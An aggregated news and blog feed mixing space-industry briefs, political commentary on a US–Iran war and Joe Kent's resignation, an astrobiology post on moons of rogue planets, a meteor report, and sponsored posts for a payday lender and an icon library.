The post Frontier justice: navigating the future legal landscape for private actors in space law appeared first on SpaceNews.

China has identified a new target near-Earth asteroid for its first planetary defense kinetic test mission, which is scheduled to launch in December 2027.
The post China signals new target for 2027 asteroid deflection test appeared first on SpaceNews.

NASA’s planetary science program, while spared steep cuts proposed last year, is still facing a funding shortfall that requires “strategic choices” about which missions to continue.
The post NASA grappling with planetary science funding shortfall appeared first on SpaceNews.

New structure gives ‘Portfolio Acquisition Executives’ authority over funding, requirements and integration across major space missions
The post Space Force overhauls buying structure with new mission portfolios appeared first on SpaceNews.

Telesat plans to carve out 25% of its Lightspeed broadband constellation for military Ka-band as the program’s latest delay pushes global service into early 2028, creating more room to align the design with shifting geopolitical priorities.
The post Telesat pivots Lightspeed toward defense as delays push global service to 2028 appeared first on SpaceNews.
Links for you. Science:
MIT study finds Earth’s first animals were likely ancient sea sponges
Deadly bird flu found in California elephant seals for the first time
There are key differences in long-term impacts of COVID and flu
An Army Corps project could wipe out one of Florida’s last thriving coral reefs
Scientists Reveal the Surprising Sex Lives of Neanderthals and Early Humans
Acceleration hotspots of North American birds’ decline are associated with agriculture
Other:
U.S. Troops Were Told Iran War Is for “Armageddon,” Return of Jesus
CBP Tapped Into the Online Advertising Ecosystem To Track Peoples’ Movements
N.Y. Attorney General Orders Hospital to Resume Youth Transgender Care
Who loses from the Anthropic fight? Maybe Elon Musk and Alex Karp.
An Unpopular, Doomed, Bloody War
American schools weren’t broken until Silicon Valley used a lie to convince them they were—now reading and math scores are plummeting
A Nationwide Book Ban Bill Has Been Introduced in the House of Representatives. Hours after the State of the Union address, House republicans introduced legislation banning LGBTQ+ books from public schools nationwide.
Law School Tells Students, ‘You MUST Be Aligned Politically With President Trump,’ For Summer Job
DC loves its historic neighborhoods. Its permitting system wouldn’t allow them today
Marco Rubio invoked a medieval antisemitic trope in justifying war with Iran
Resist ‘dangerous and socially unacceptable’ age checks for social media, scientists warn
US Commanders Want to Make War With Iran as ‘Bloody’ as Possible to Bring About Biblical End Times, Officers Report
Jasmine Crockett’s Cryptocurrency History Is Under Scrutiny. Here’s What Her Record Tells Us.
Military Commander Tells Troops Bombing Iran Is ‘Part Of God’s Divine Plan’
Judge to Trump on Congestion Pricing: Get Outta Here
The money behind the new Iran War
Republicans Wage War As Politics …and politics as war.
The US/Israeli Bombing Of Iran: Means and Ways Without Ends (“Stop asking what the US government’s intentions are, they do not exist outside of the personal interests of Donald Trump.”)
The Great Replacement of Conservative Ideology
The Disappearing American Mortgage
Trump Labor Secretary Caught Using Govt Funds for Her Birthday Party
Pete Hegseth’s Crazed, Angry Tirades on Iran Give Dems a Big Opening
‘Disgraceful’: What McKee’s remark says about his warped view of primary elections
The casino-fication of war
Prosecutors Keep Charging Women Who Have Abortions For Crimes They Did Not Commit
Confidential database reveals which items NPS thinks may ‘disparage’ America
Parents Tried to Shield Their Children From Vaccines. Instead They Got Measles. Spartanburg County in South Carolina is ground zero for the largest measles outbreak since 2000. One school has a vaccination rate of 21 percent.
She’d Never Changed Her Gender Marker. Kansas Invalidated Her License Anyway. A trans Kansas resident recently changed her name but not her gender marker on her license, fearing what Kansas may do if she did. The Kansas DMV still flagged her ID.
McTuscan heaven
Many alleged suicides of Black trans women are in fact modern-day lynchings, report finds. Jill Collen Jefferson, the founder of JULIAN, explains what happens when a transgender woman’s death is ruled a suicide and a community calls it something else.

The contract is for 20 hypersonic flight missions over four years
The post Rocket Lab wins $190 million Pentagon deal for hypersonic test flights appeared first on SpaceNews.

Maj. Gen. Keener: The exercise will help Space Command ‘better understand commercial challenges, requirements, and how we can better work together’
The post Space Command classified wargame to include 25 commercial players appeared first on SpaceNews.

SAN FRANCISCO — TransAstra is performing a study, funded by investors and customers, to explore the technical feasibility of moving a 100-metric-ton asteroid to a stable near-Earth orbit. “We want to bring an asteroid to the Earth-moon system and turn it into a robotic research outpost for materials processing and manufacturing in space,” Joel Sercel, […]
The post TransAstra aims to move 100-ton asteroid to stable orbit for processing appeared first on SpaceNews.
Oh, Cesar. You’ve broken my heart. Accusations of Cesar sexually abusing young girls have come out. The New York Times did a detailed and careful look at the evidence and it certainly looks to be true.
Cesar Chavez was, and will continue to be, perhaps my greatest hero. His enormous sacrifice, it’s effectiveness, that it went on his whole life and cost him wealth, health, and any sort of normal life. A length and depth of heroism and sacrifice that’s hard to find others comparable to. For all of that he will continue to be my hero, but now with a devastating and critical flaw.
I wrote about him back in 2012, admiring his character and his accomplishments, and have continued to carry that admiration. Now these accusations, they don’t change that side of him, but they add another horribly unfortunate side. The damage to we who admired him, the damage to his reputation and causes, is terrible but of course the harm to those victims is the worst part of it.
Reverend Martin Luther King Junior was often rumored to have affairs but that’s a common human foible and something for married couples to sort out between themselves. It’s not like the amoral disregard for the harm Cesar apparently inflicted on these young victims.
While I admire his good side and his causes, if he were alive and running for office today I would vote against him. It’s one of the oddities of the Trump period that people could know of his immorality, which he has openly bragged about, yet vote for him. I couldn’t do that. He has no confirmed allegations against anyone under age, but he has demonstrated almost unbounded amoral disregard for harms he’s willing to do to others. If a candidate promised all the policy changes I could wish for, and seemed a credible leader who could carry them out, but was flagrantly immoral, not just in personal ways like affairs but in ways that hurt victims and innocent people, I couldn’t vote for them. I would have to decide that progressive progress would just have to skip this opportunity and work for and hope for a better candidate next time.
But Cesar had seemed to have none of that. He seemed about as close to a human angel as could be. Now… Oh, Cesar.
“FREEDOM OF THE PRESS IS NOT JUST IMPORTANT TO DEMOCRACY, IT IS DEMOCRACY.” – Walter Cronkite. CLICK HERE to donate in support of our free and independent voice.
The post Oh, Cesar appeared first on DCReport.org.

SpaceX is preparing for its 35th Starlink mission of the year, which will launch on a Falcon 9 rocket from Cape Canaveral Space Force Station on Thursday morning.
The Starlink 10-33 mission will add another 29 Starlink V2 Mini satellites to the low Earth orbit megaconstellation, which now consists of more than 10,000 spacecraft.
Liftoff from Space Launch Complex 40 appears to be scheduled for 10:20 a.m. EDT (1420 UTC). The Falcon 9 rocket will fly on a north-easterly trajectory upon leaving the pad.
Spaceflight Now will have live coverage beginning about an hour prior to liftoff.
The 45th Weather Squadron forecast a mixed outlook for a launch on Thursday morning. Launch weather officers predict that there will be a 75 percent chance for favorable conditions at the opening of the window. That drops to 60 percent favorable by the end of the window.
“Although dry conditions will persist today, coastal showers may develop on Thursday, some of which could move near the launch pad during the primary launch window,” meteorologists wrote on Wednesday.
“Additionally, mid-level clouds may approach the region early Thursday, possibly overlapping with the primary launch window, as well. Given this, there is a low risk of a Cumulus Cloud Rule and Thick Cloud Layers rule violation Thursday morning.”
SpaceX will launch the mission using the Falcon 9 first stage booster with the tail number 1077. This will be its 27th flight after launching missions, like NASA’s Crew-5, CRS-28, and NG-20.
Nearly 8.5 minutes after liftoff, B1077 will target a landing on the drone ship, ‘Just Read the Instructions’, positioned in the Atlantic Ocean. If successful, this will be the 154th landing on this vessel and the 588th booster landing to date.
The 29 Starlink satellites will be deployed from the rocket’s upper stage a little more than an hour after liftoff.
The subtitle is The Real Reasons Economies Shrink and What To Do About It. Here is from the book’s summary:
Contrary to popular perception, recessions are not the inevitable bust that follows an unsustainable boom, and they do not operate like wildfires that clear out economic deadwood. Recessions are caused by adverse shocks like war and energy price spikes; and far from unleashing gales of creative destruction, post-recession economic growth typically resumes the same trend as before—all pain, no gain.
The book covers American history and focuses on verbal exposition of the theory, not mathematics. Overall, Goodspeed provides an underrated perspective in an era where 2008-2009 led people to become overly obsessed with issues of aggregate demand. Our current presidency may be curing this however!
The post *Recession*, by Tyler Goodspeed appeared first on Marginal REVOLUTION.
Around the world, digital banking has made financial services more accessible and convenient. Over the last decade, the number of unbanked adults has decreased from 2.5 billion to 1.4 billion. Behind these figures are millions of people who can now keep their money safe, borrow at fair rates, and handle emergencies without falling into debt traps.
“Financial inclusion in banking means more than just opening an account,” says Eric Bank, Finance and Business Writer at 1F Cash Advance. “It’s about making sure financial services are affordable and available to everyone. When people can access fair loans and simple tools to manage money, they not only cover today’s needs but also gain the chance to build stability for the future.”
Still, even in the United States, millions remain outside the system. Many families have no bank account or cannot rely on their bank for an affordable loan. As a result, everyday expenses and sudden emergencies often create serious stress. Today, nearly 7 in 10 Americans report financial anxiety. This highlights the importance of expanding access to clear, fair, and inclusive funding options and why services like 1F Cash Advance are crucial in closing the gap.
Financial inclusion means that every person has access to the basic tools needed to manage their finances, such as a bank account, simple ways to send and receive payments, and reliable insurance. These services must not only be available but also safe, transparent, and affordable over time. When people can use them freely, they become full participants in the financial system. And this participation creates a solid foundation: it helps families stay resilient in tough times and gives them the opportunity to build long-term stability and wealth.
Financial inclusion is considered a “key enabler” for cutting poverty and boosting shared prosperity. It supports entrepreneurship, marginalized groups, and overall economic growth.
Unfortunately, the system is not functioning optimally for all consumers at this time. Millions of Americans lack full access to banking and loans.
Being underbanked means you have a bank account, but you still depend on other, often more expensive, financial services. For example, you might keep money in a checking account but regularly use payday loans, check-cashing stores, or money transfer services to get by. The FDIC defines the underbanked this way: people with insured bank accounts who still rely on alternative financial services because traditional banking doesn’t meet their needs.
A person is considered unbanked if they don’t have a checking or savings account with a bank or credit union that’s FDIC-insured. In other words, they live completely outside the formal banking system. Instead of using an account, they rely on cash for almost everything—getting paid, paying bills, and keeping their money safe. All of their savings are stored in physical form, often at home or through informal methods, rather than in a secure bank.
Why does this happen? In many cases, people lack easy access to a bank branch or a reliable internet connection, making it difficult for them to use online banking. Others avoid banks because fees feel too high or unpredictable, especially for those living paycheck to paycheck. Some people believe they don’t have “enough money” to make a bank account worthwhile. And for many, there’s also distrust. Banks are required to comply with Know Your Customer (KYC) and Anti-Money Laundering (AML) regulations, meaning they are obligated to collect customers’ personal information.
In 2023, data showed big differences in how many families were unbanked or underbanked across the U.S. Twenty states with the largest rates of unbanked residents were identified. The highest numbers were in the South, with Mississippi at 9.4% and Louisiana at 8.0%. On the other end, Vermont and Virginia had the lowest share, just 0.9%. The pattern for underbanked households looked very similar, showing that access to banking depends a lot on where people live.

1F Cash Advance is a U.S.-based financial service that provides quick, small-dollar loans through an online platform. In recent years, the company has expanded its nationwide presence, positioning itself as a convenient source of emergency funds for individuals who may not qualify for or have the time to obtain traditional loans. They follow several ways of contributing to financial inclusion in the U.S.:
A core goal of financial inclusion is to ensure that loans are accessible to those who need them, including individuals with imperfect credit histories or low incomes. 1F Cash Advance addresses this by using more flexible approval requirements. Rather than relying solely on credit scores, the company focuses on an applicant’s current income and near-term ability to repay. If an applicant has a steady income or another reliable source of earnings, they may qualify. This approach can expand access for borrowers who might be turned down elsewhere.
As of March 2026, 1F Cash Advance operates over 80 storefront locations across multiple states, in addition to its online service. This footprint gives more communities access to nearby short-term lending, with the company complying with local regulations and rate caps in each state. To illustrate approval patterns in Q4 2025, the table below shows approval rates by credit tier for 1F Cash Advance applicants.

“We try to keep the process fast and simple, because our underbanked customers need it. In a financial emergency, the bills are due now, and we get the point,” said Edward Evans, Money Management Expert at 1F Cash Advance.
The company has built its service to provide near-instant approvals and fast funding. Applications are done online, using a straightforward form that takes only minutes to fill out. Thanks to automation and advanced analytics, the platform can often deliver a lending decision within an hour or even immediately:

With 1F Cash Advance, you can get funds entirely online at any time of day. This is a big advantage for people who don’t live near a bank branch or whose work schedules make it difficult to visit lenders in person. Going digital also helps remove the stress many consumers feel when dealing with banks face-to-face—whether it’s the fear of being judged for their financial situation, the pressure of complex paperwork, or the worry of being declined in front of others. Instead, they can apply privately and comfortably from the comfort of their own home. This level of convenience reflects a broader trend in financial inclusion: meeting customers where they are. And just as important as convenience is speed—how quickly someone can actually get the money they need.

“Financial inclusion must also be about fairness and sustainability. If a loan product puts borrowers in a worse position through hidden fees or unaffordable terms, it’s not truly inclusive – it’s exploitative. We strictly prioritize transparency and consumer protection as part of our company’s model,” explains Latoria Williams, CEO at 1F Cash Advance.
The loan terms are presented with clear repayment schedules and total costs upfront, so borrowers know exactly what they must pay and by when. The service helps clients avoid the confusion or surprises that have often plagued payday lending. That’s the best practice urged by regulators for small-dollar loans as part of expanding financial inclusion.
Compliance might sound technical, but it has a real impact. For instance, many states cap payday loan APRs to prevent excessively high rates, and by following these laws, 1F Cash Advance cannot charge beyond what’s deemed reasonable in those jurisdictions. Beyond just meeting the legal requirements, the company has taken steps to educate its borrowers, a somewhat unique feature in the quick-loan industry. They are tips on budgeting for repayment, setting up reminders, and avoiding taking on more debt than necessary. The idea is to help customers use the product wisely, building trust in the company simultaneously.
The best way to measure whether a lender is truly inclusive is to look at how it supports people in their everyday lives. At 1F Cash Advance, the data makes this clear: quick loans often serve as a real lifeline. After reviewing thousands of cases, the company found that most borrowers turned to these loans for essential needs, such as:
Well, Americans aren’t taking out short-term loans for luxuries; they’re doing it to solve urgent, unavoidable challenges in their lives. When 1F Cash Advance can deliver funds quickly in these situations, it can prevent worse outcomes. One more indicator of impact is how many people are being reached:

Figure 5. Application Growth by State at 1F Cash Advance, 2023–2024
This role becomes even more significant when placed in the broader context of today’s economy. The economic effects of tighter lending by banks reveal how many households are being left behind. At the same time, inflation in recent years has increased the burden on family budgets, making affordable financial solutions especially in demand.
In this environment, fast and flexible services like those offered by 1F Cash Advance fill a crucial gap. They provide a financial safety net for the modern workforce, ensuring that essential needs can still be met even when a mainstream loan is unavailable. Importantly, this support does not compete with banks but complements the financial system, demonstrating how alternative lenders can act as partners in achieving financial inclusion.
The need to develop strategies to improve financial inclusion is clear. Bank On accounts, instant payments, and more consumer-focused online lenders are lowering barriers. The share of unbanked households is near historic lows, and millions more have opened accounts over the past decade. But gaps remain: low-income families, people of color, and gig workers still struggle to find fair, simple financial services.
Fintechs and other nonbank providers play a crucial role in reaching people that the traditional system doesn’t. As an online lender, 1F Cash Advance uses technology to reduce paperwork, provide plain-language pricing, and deliver funds quickly.
Supporting financial inclusion in the U.S. means meeting people where they are financially. Each year, more Americans gain access to basic accounts, digital payments become more widespread, and alternative online financial services face stronger oversight. With continued innovation, exemplified by 1F Cash Advance’s model, a more inclusive financial system is within reach.
Marsha Welch is a financial writer who helps people navigate loans without unnecessary stress. She writes in a way that does not scare or confuse. Marsha structures explanations in a logical, step-by-step way, so even complex topics make sense on the first read.
At 1F Cash Advance, she is responsible for how the loan process is explained on the site. Marsha revises and updates content to keep it simple and current, even when terms and products change. Her goal is to help readers calmly compare options and understand the fine print before they make a decision.
CLICK HERE TO DONATE IN SUPPORT OF DCREPORT’S NONPROFIT NEWSROOM
The post How 1F Cash Advance Supports Financial Inclusion in the US appeared first on DCReport.org.
Israeli raids have killed another pair of Iranian leaders seen as important to any attempt to halt the U.S.-Israeli air raids meant to destabilize that country.
Those targeted included Ali Larijani, Iran’s top national security official, close adviser to the killed ayatollah and its de facto, most practically minded leader. As Iran experts tell us, if Donald Trump were to want to negotiate an end to this preemptive war, it was likely to involve working with Larijani, who apparently bridges many of Iran’s political divisions.
Also reported dead was Gholamreza Soleimani, the head of the Basij, Iran’s brutal plainclothes militia that is key to any hoped-for organized, popular uprising.
It seems that the continuing efforts to “decapitate” Iranian leadership are exposing some differences between the still nebulous goals sought by Trump or by Israeli Prime Minister Benjamin Netanyahu, and some increased concern about how any end to this Middle East conflict could come about.
Trump keeps repeating that he is seeking a “Delcy” character in Iran, referring to Delcy Rodriguez in Venezuela, to whom Trump has turned after grabbing former leader Nicolás Maduro, to keep that country running in cooperation with the White House view of the world. Larijani was not a senior Shiite cleric and could not succeed Ayatollah Ali Khamenei but had the supreme leader’s ear for policy and was the kind of figure Trump apparently wants as a more practical leader in Iran.
Still, it was Larijani who ordered brutal methods to stop Iranian protests, using Soleimani’s forces, and he apparently oversaw nuclear negotiations as well as plans for managing Iran during a potential war with the United States.
If the complexities of a war that Trump refuses to call a war mount by the day, the kept vow by Israel to kill any new leadership in Iran is certain only to make things more confusing.
We understand what happened, but not what it means.
So, did Israel act alone in this assassination, or did Trump authorize killing another leader that he otherwise might want as a negotiating partner? Was Team Trump working behind the scenes to reach out to Larijani? Does the U.S. have anyone in Iran to talk with? Is anyone in charge here of anything beyond identifying more military targets to hit?
Even with the perspective of only three weeks, it is apparent that Trump thought this was another short-term military raid that would prove Iran so weak it would roll over to whatever demands he made. That’s not working. Iran is defiantly moving against shipping in the Strait of Hormuz, upsetting global oil supplies and prices, and unleashing proxies and cells to attack the U.S. as it sees fit, without organized military.
In combination with what looks to be a global shunning of cooperation to send ships to clear Gulf shipping lanes, Israel’s potentially divisive strategy to stir as much disruption as possible in Iran is further cornering Trump.
Trump neither orders the death of any emerging Iranian figure nor does he disown the action when Israel moves ahead. Indeed, Trump is silent or confusing about what our goals in this war are. Netanyahu sees only advantage in spreading war to Lebanon, the West Bank, and defanging Iran’s missile capabilities, and Trump is unclear about those developments as well. We’re way beyond talk of nuclear weapons development in labs.
Apart from a war with fuzzy, changing goals, rocketing gas and oil prices are worsening domestic political problems for Trump. It’s obvious that striking Iran is proving to be a critical decision for Trump’s presidency.
The question is whether knocking off successive Iranian leadership leads to anything more than continued warfare.
Meanwhile, a key resignation in Washington over opposition to the war in Iran is drawing extra attention. Joe Kent, a former GOP congressional candidate and MAGA commentator who had been named by Trump to lead the National Counterterrorism Center, resigned in protest over the what he said was Israel’s successful lobbying of Trump to launch a war with no imminent threat.
As a major rebuke on the conflict from a member of his administration, the issue was whether other departures would follow.
“FREEDOM OF THE PRESS IS NOT JUST IMPORTANT TO DEMOCRACY, IT IS DEMOCRACY.” – Walter Cronkite. CLICK HERE to donate in support of our free and independent voice.
The post Knocking Off Iranian Leaders appeared first on DCReport.org.
Maintaining a consistent visual language across a growing product is a massive operational challenge. Design teams often start by drawing a custom set of vector assets to match their brand. This works perfectly for the first fifty elements. When the product scales to include complex settings menus, specialized document types, and edge-case error states, the design team becomes a bottleneck. Designers are forced to stop working on user experience flows just to draw a new biometric scanner or database symbol.
Icons8 solves this scaling problem by providing a library of over 1,476,100 assets distributed across more than 45 distinct visual styles. Teams can rely on these massive pre-built libraries rather than drawing and maintaining every single asset from scratch.
I usually start my Tuesday reviewing tickets for upcoming feature sprints. Today, the requirement is a new file management dashboard. I need a standard folder, a shared folder, a deleted folder, and a locked folder.
Instead of opening Illustrator, I launch the Pichon Mac app. I type “folder” into the search bar and filter the results by the Windows 11 Outline style. I drag the standard folder directly onto my Figma canvas. The library does not have the exact locked folder variation I want in this specific style. I click on the standard folder to open the in-browser editor. I use the subicon feature to drop a small padlock shape over the bottom right corner of the folder. I adjust the stroke thickness to match, scale the padding, and recolor the entire combined asset to our brand’s primary HEX code. I download the customized SVG and drop it into my file. The entire process takes three minutes, and I move straight back to designing the actual user interface.
Different disciplines require completely different asset formats and delivery methods. Icons8 accommodates these requirements through specific collection and export features.
A UX team is building a new application that will launch simultaneously on iOS and Android. The platforms require different visual guidelines. Apple mandates strict iOS design guidelines, while Android relies on Material Design principles.
The designers create two separate Collections within Icons8. For the Apple version, they pull assets exclusively from the iOS 17 style pack, which contains over 30,000 items in Filled, Outlined, and Glyph variations. For the Android version, they source from the Material Outlined pack.
Once all the navigation elements are gathered in the Collections, the designers use the bulk recolor tool to apply the brand palette to both sets at once. They export the Collections. Instead of downloading dozens of loose files, they export the sets as individual SVG sprite sheets. The front-end developers receive two clean, organized files containing all the vector paths they need for both operating systems.
A marketing team is assembling a promotional landing page and a pitch deck for a new software release. Static images are not engaging enough for the landing page hero section.
The marketers search the library and apply the animated filter. They browse the 4,500 animated assets and select a cohesive set in the 3D Fluency style. For the web developers, they download the files in the Lottie JSON format. This ensures the animations will scale smoothly on high-resolution mobile devices without bloating the page load speed. For the pitch deck, they download the exact same assets in GIF format and drop them directly into their presentation slides. The visual style remains identical across the coded website and the sales deck.
Finding the right icons for a project usually means choosing between open-source repositories and massive aggregator marketplaces. Both paths come with significant trade-offs.
Open-source packs like Feather or Heroicons provide exceptionally clean, well-constructed vectors at no cost. They are perfect for early-stage startups building basic interfaces. They completely fail on volume. Most open-source packs top out at a few hundred items. The moment your application requires a niche metaphor, you have to draw it yourself, defeating the purpose of using a pre-built library.
Marketplaces like Flaticon and the Noun Project solve the volume problem but introduce a consistency problem. These platforms aggregate submissions from thousands of independent authors. You might find twenty different database symbols, but they will all have different grid alignments, corner radii, and line weights. Mixing them makes an interface look fragmented and unprofessional.
Icons8 bridges this gap by utilizing an in-house design team to build massive style packs. A single style like iOS 17 contains tens of thousands of assets built on the exact same grid with the exact same rules.
Getting the most out of this platform requires looking past the basic search bar and utilizing the built-in technical tools.
The free tier is highly restrictive. Free users are limited to rasterized PNG files capped at 100px in size. Using any asset on the free plan also requires adding a mandatory attribution link to your project. Accessing scalable vector formats like SVG and PDF, or downloading high-resolution PNGs up to 1600px, requires a paid Icons plan at $13.25 per month.
While the Popular, Logos, and Characters categories are available in all formats for free, commercial use of logos and characters requires explicit approval from the respective trademark owners.
The platform’s integrations have technical boundaries. You cannot use the Mega Creator tool or the Lunacy vector editor to modify any of the animated assets.
Finally, this product is not the right choice for brands that rely on a highly unconventional, bespoke illustrative identity. If your brand guidelines mandate a chaotic, hand-drawn aesthetic with specific brush strokes that cannot be matched by the 45 predefined visual styles, you will still need to hire an illustrator to build your library from scratch.
The post Scaling Visual Language Without Building In-House Icon Sets appeared first on DCReport.org.
1. Congestion pricing for WDC? It is good to see a move away from the selective invocation of economic reasoning, and recognition that some degree of congestion does not justify every tariff.
2. Zimbabwean Uber drivers in Cape Town.
3. Northern Mariana Islands fact of the day.
4. Advances in asteroid protection? (NYT) And Jason Furman on today’s economy (NYT).
5. Benefits of a malaria vaccine.
6. New podcast on longevity biotech.
7. Anthropic recruiting for economic research positions.
The post Wednesday assorted links appeared first on Marginal REVOLUTION.
I don’t write science fiction, but I have several friends who think I do simply because I write about distant planets and futuristic ways to reach them. The boundary between SF and science has always fascinated me. I like to poke around in old magazines, most of them from the science fiction field, but a particular interest is magazines like Hugo Gernsback’s Science and Invention and Radio News, early 20th Century venues for fiction that dealt with science and preceded 1926’s Amazing Stories.
Astronomy and fiction have been mingling for a long time, but as we uncover startling exoplanets and posit theories that explain them, I’m usually wondering how quickly an SF writer will pick up on the latest work with a stunning new setting. Today’s paper offers another opportunity, as it presents the possibility that ‘rogue’ planets, wandering in the interstellar dark without a warming Sun, may support biology not on their surfaces but on any potential moons.

Image: Artist’s rendition of a Jupiter-sized rogue planet moving through interstellar space without any star. Scientists have been exploring the possibility of life on worlds warmed by internal heating alone. A new paper now looks at moons around such worlds and the processes that could keep them warm. Credit: JPL/Caltech.
Scientists involved with the German research network ORIGINS, working with researchers at the Max Planck Institute for Extraterrestrial Physics (near Munich) believe that large moons of free-floating planets can retain liquid water oceans for over 4 billion years because of the twin effects of dense hydrogen atmospheres and tidal heating. That closes in on the amount of time Earth has existed, with the obvious implication that complex life could develop.
Lead author David Dahlbüdding (Ludwig-Maximilians-Universitat Munchen) is lead author of the study:
“Our collaboration with the team of Professor Dieter Braun helped us recognize that the cradle of life does not necessarily require a sun. We discovered a clear connection between these distant moons and the early Earth, where high concentrations of hydrogen through asteroid impacts could have created the conditions for life.”
Recent work has shown that a gas giant ejected from its birth system could retain moons despite the gravitational encounter that would have forced it into interstellar space. Orbiting moons would be nudged into elliptical orbits by the event, but the resulting tidal forces between moon and planet are a blessing in disguise, in that they could generate enough frictional heat to maintain surface oceans. An atmosphere rich in hydrogen can also undergo ‘collision-induced absorption.’ in which thermal radiation is then retained by the atmosphere.
Earlier papers have examined rogue planet atmospheres heavy in CO2, where atmospheric collapse is a probability. But the researchers think hydrogen is far more interesting. From the paper:
The present-day Earth looks much different from the worlds presented here, which, with their thick hydrogen envelopes and possibly deep oceans, resemble a Hycean planet. Although usually in the sub-Neptune range, these worlds are prime candidates for the detection of life (Madhusudhan et al. 2021, 2023a,b). In their case, any tidal heating could conversely narrow the habitable zone (Livesey et al. 2025). Our small-scale Hycean worlds could provide relatively better conditions for life. Due to their (∼ 25%) lower gravity, high-pressure ices between a potential liquid water ocean and the rocky core would be less likely, allowing the ocean to receive essential nutrients (Cockell et al. 2024). Although, as Madhusudhan et al. (2023a) note, this represents only one possible source of these essential biological elements.
What to make of this? Extending the range of possible biology is always interesting, but the natural question is how we might actually observe such a system. Free-floating planets are a difficult enough catch without bringing potential moons into the mix. Gravitational microlensing offers a faint possibility, but here we’re dealing with chance encounters with background stars that are beyond our conceivable likelihood to predict. Although the authors mention transits of the host free-floating planet, this seems quite a reach. How do we know where to look, when their presence is unpredictable? The Roman Space Telescope should detect plenty of rogue planets, but the issue remains – a gravitationally microlensed event is by its nature unrepeatable.
I don’t want to downplay targeted searches for young rogue planets still throwing a good infrared signature in their adolescence. These we might actually detect through direct imaging if we scan nearby star clusters, so it’s not outside the realm of possibility to think we might get a rare transit of a moon. But the unlikeliness of such a detection means we may have to chalk this up as a fascinating theoretical result without observational consequences, at least at the present state of our technology.
Still, what an interesting landscape for a science fiction tale…
The paper is Dahlbüdding et al., “Habitability of Tidally Heated H2-Dominated Exomoons around Free-Floating Planets,” in process at Monthly Notices of the Royal Astronomical Society 24 February 2026 (full text).

Surprising no one, Meta’s new AI glasses are a privacy disaster.
I’m not sure what can be done here. This is a technology that will exist, whether we like it or not.
Meanwhile, there is a new Android app that detects when there are smart glasses nearby.
A large meteor crashed through the sound barrier above northern Ohio on Tuesday morning, producing a large fireball and what local residents described as an extremely loud "boom."
According to various eyewitness reports, the meteor's bright streak through the morning sky was visible across a wide area. A National Weather Service meteorologist in Pennsylvania, Jared Rackley, captured video of the meteor passing through the atmosphere and creating a large fireball. So far, there have been no reports of impacts on the ground.
The precise location of the fireball was pinpointed by a near-infrared optical detector on a geostationary satellite at 9:01 am ET (13:01 UTC). This "geostationary lightning mapper" revealed that the meteor traversed through the atmosphere in northern Ohio, just west of Cleveland, and over Lake Erie.

What does true wilderness look like? A photographer captures a rare slice of it in this refuge threatened by development
- by Aeon Video
I hosted a discussion on Substack Live this afternoon with TPM’s voting rights reporter Khaya Himmelman, who has covered election administration and voter suppression issues for TPM for at least two significant election cycles now.
Khaya and I spoke about her pre-TPM coverage of disinfo for a handful of other news outlets and her work unpacking and debunking the various conspiracy theories that emerged in the aftermath of the 2020 election — and how it’s all coming back to haunt us now.
As the new lead author of The Franchise, TPM’s voting rights newsletter, Khaya and I also discussed the themes she is focused on heading into a busy midterms cycle, the 2020 conspiracy theories that Trump is trying to breathe new life into (via his compromised DOJ) and a little bit about why MyPillow Guy Mike Lindell always answers the phone when she calls.
Check it out here:

There must certainly be a word-stacking German term for the uncanny feeling of watching as a patently unqualified, far-right, election-denier white nationalist freak becomes the only administration figure to resign over the increasingly disastrous Iran War with an at least vaguely antisemitic gripe. It is an interesting moment. Let’s remember that Joe Kent, the director of the National Counterterrorism Center, isn’t just some administration official. He’s a white nationalist extremist who had no business holding any position of trust in the U.S. government. He’s been friends to numerous antisemites long before today’s news broke.
Some people are inclined to be sympathetic to the ideas contained in Kent’s claim that “[i]t is clear that we started this war due to pressure from Israel and its powerful American lobby.” If that’s you, think a bit more seriously about just how Israel would be in a position to exert this “pressure” and don’t let your animus toward Trump make you a fellow traveler with someone as odious as Kent.
Benjamin Netanyahu is a lifelong manipulator, schemer and liar. No foreign country can pressure the U.S. into doing something as catastrophically stupid as what we’ve seen over the past three weeks. Did Netanyahu want this? Of course he did. Netanyahu has wanted to convince American leaders to believe they have interests identical to his narrow, usually wrongheaded and always regional goals for 30 years. Only Donald Trump is so stupid, so desperate for the adrenaline fix of another regime change on the cheap, that he went for it. It is Trump who insulated himself from all but the advice of two or three ignorant toadies so that he was able to stumble this badly into a situation in which the strategic initiative — notwithstanding all the damage Iran has sustained — is now in the hands of the Iranians.
Think how bad you have to screw things up to get into that position?!?!
Kent’s comments, predictably, revealingly, are not so much to blame Israel as to exonerate Trump. And that’s precisely how antisemitism works. It’s not Trump’s fault. He was taken in by “pressure” from the Israelis. The U.S. has its own vast intelligence resources. It has its own region experts. Israel couldn’t pressure or convince Trump that Iran posed some imminent threat to the U.S. Indeed, no one in the Trump White House thought anything like that. The U.S. and Israel went to war not because Iran was strong or about to do anything to the U.S. or really anyone else but because the country is currently so weak. Iran was on its back and it seemed like you could go to war with them and they wouldn’t be able to strike back. (Mostly true — except for the thing they can do easily, harry the Strait of Hormuz.) Trump thought this would be easy. He made this decision on his own, because he thought it would be fun and that it would be simple, as a vast, kinetic kind of self-soothing because of the skids his presidency is on at home.
It’s a very weird time for anyone serious about the scourge of antisemitism in this country. One simultaneously has to make the point again and again and again against the claims of bad-faith operators that being critical of Israel is not antisemitic. At the same time more and more Americans, left and right, are jumping into conversations, bandying about ideas and fetid ancient dialogs that are just that: antisemitism. Both are true. Let’s call this what it is and remember who Joe Kent is.

Our friend John Judis had an essay over the weekend in NOTUS airing the provocative and audacious claim that Trump is a world-historical figure in the way that the German philosopher Hegel used the term. This is a proposition sure to drive many to distraction. And perhaps for good reason. But as I told John in an email I largely agree with him, but with an important exception or difference in the way he articulated the claim. Before getting to that, let me give a very, very brief outline of the concept.
The idea here is not that the figures in question — an Alexander or Caesar or Bonaparte, the figures Hegel thought of — are good people. It’s not even that they necessarily have any articulate awareness of their role in history. It’s that there are some individuals who have an intuitive sense of the opportunities of the historical moment. They then acquire power and force huge changes that drive the course of history in dramatically new directions, directions that are essentially impossible to undo. The key is there’s really no going back from the changes these people make.
When I considered this I decided that it’s actually quite similar to an argument that I’ve made here a number of times. And that is that the old order is categorically shattered. There’s no going back. This is the real takeaway of the Biden presidency. I still think it will likely be judged more generously in the future than it is today. But big picture it was a failure, as would be any effort to simply turn back the tide of Trumpism or reconstitute the political world we knew before Trump. That world, that political order is gone. We know that not only because of all the things Trump has destroyed but also because that old order was feeble and vulnerable enough for Trump and Trumpism to be able to destroy it. Last fall, I said, at first jokingly but then with growing seriousness, that the greatest proof case of Trump’s claim of a corrupt American elite was the ease by which he scythed through it.
